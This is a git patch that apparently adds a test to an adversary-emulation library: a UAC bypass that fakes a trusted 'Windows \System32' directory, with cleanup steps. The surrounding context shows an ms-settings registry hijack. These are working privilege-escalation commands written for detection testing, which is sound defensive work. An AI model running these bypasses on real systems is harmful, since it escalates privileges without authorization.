From bb945c8d61d780926cf152cdcb72205fd2976ae4 Mon Sep 17 00:00:00 2001 From: dwhite9 Date: Mon, 2 Dec 2019 10:39:07 -0600 Subject: [PATCH] T1088 mocking trusted directories - New Atomic (#704) * Created rough draft for new atomic: T1088 - UAC Bypass via Mocking Trusted Directories. * Fixed typo in Mocked directory. Tested cleanup commands successfully. * Fixed path of cleanup command to match change in directory of primary command. --- atomics/T1088/T1088.yaml | 26 +++++++++++++++++++++++++- 1 file changed, 25 insertions(+), 1 deletion(-) diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml index bb70db03..da18b9f2 100644 --- a/atomics/T1088/T1088.yaml +++ b/atomics/T1088/T1088.yaml @@ -115,4 +115,28 @@ atomic_tests: Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\ComputerDefaults.exe" cleanup_command: | - Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse \ No newline at end of file + Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse + +- name: Bypass UAC by Mocking Trusted Directories + description: | + Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems, however the directory structure will be created. + + supported_platforms: + - windows + + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + + executor: + name: command_prompt + elevation_required: true + command: | + mkdir "\\?\C:\Windows \System32\" + copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe" + mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" + cleanup_command: | + rd "\\?\C:\Windows \" /S /Q + del "c:\testbypass.exe"